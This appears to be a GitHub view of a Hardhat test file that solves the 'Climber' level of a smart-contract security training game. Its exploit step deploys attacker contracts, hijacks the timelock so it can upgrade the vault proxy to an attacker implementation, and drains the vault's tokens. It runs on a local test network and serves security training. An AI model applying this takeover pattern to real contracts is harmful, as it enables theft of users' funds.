generated from PaulRBerg/hardhat-template
-
Notifications
You must be signed in to change notification settings - Fork 9
/
Copy pathclimber.challenge.ts
63 lines (51 loc) · 2.85 KB
/
climber.challenge.ts
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
const { ethers, upgrades } = require("hardhat");
const { expect } = require("chai");
describe("[Challenge] Climber", function () {
let deployer, proposer, sweeper, attacker;
// Vault starts with 10 million tokens
const VAULT_TOKEN_BALANCE = ethers.utils.parseEther("10000000");
before(async function () {
/** SETUP SCENARIO - NO NEED TO CHANGE ANYTHING HERE */
[deployer, proposer, sweeper, attacker] = await ethers.getSigners();
await ethers.provider.send("hardhat_setBalance", [
attacker.address,
"0x16345785d8a0000", // 0.1 ETH
]);
expect(await ethers.provider.getBalance(attacker.address)).to.equal(ethers.utils.parseEther("0.1"));
// Deploy the vault behind a proxy using the UUPS pattern,
// passing the necessary addresses for the `ClimberVault::initialize(address,address,address)` function
this.vault = await upgrades.deployProxy(
await ethers.getContractFactory("ClimberVault", deployer),
[deployer.address, proposer.address, sweeper.address],
{ kind: "uups" },
);
expect(await this.vault.getSweeper()).to.eq(sweeper.address);
expect(await this.vault.getLastWithdrawalTimestamp()).to.be.gt("0");
expect(await this.vault.owner()).to.not.eq(ethers.constants.AddressZero);
expect(await this.vault.owner()).to.not.eq(deployer.address);
// Instantiate timelock
let timelockAddress = await this.vault.owner();
this.timelock = await (await ethers.getContractFactory("ClimberTimelock", deployer)).attach(timelockAddress);
// Ensure timelock roles are correctly initialized
expect(await this.timelock.hasRole(await this.timelock.PROPOSER_ROLE(), proposer.address)).to.be.true;
expect(await this.timelock.hasRole(await this.timelock.ADMIN_ROLE(), deployer.address)).to.be.true;
// Deploy token and transfer initial token balance to the vault
this.token = await (await ethers.getContractFactory("DamnValuableToken", deployer)).deploy();
await this.token.transfer(this.vault.address, VAULT_TOKEN_BALANCE);
});
it("Exploit", async function () {
// https://forum.openzeppelin.com/t/execute-upgrade-using-different-signer/14264
this.upgradedAttackerContract = await ethers.getContractFactory("UpgradedAttacker", attacker);
this.attackerContract = await (
await ethers.getContractFactory("ClimberAttacker", attacker)
).deploy(this.timelock.address, this.vault.address, attacker.address);
await this.attackerContract.connect(attacker).attack();
const compromisedVault = await upgrades.upgradeProxy(this.vault.address, this.upgradedAttackerContract);
await compromisedVault.connect(attacker).sweepFunds(this.token.address);
});
after(async function () {
/** SUCCESS CONDITIONS */
expect(await this.token.balanceOf(this.vault.address)).to.eq("0");
expect(await this.token.balanceOf(attacker.address)).to.eq(VAULT_TOKEN_BALANCE);
});
});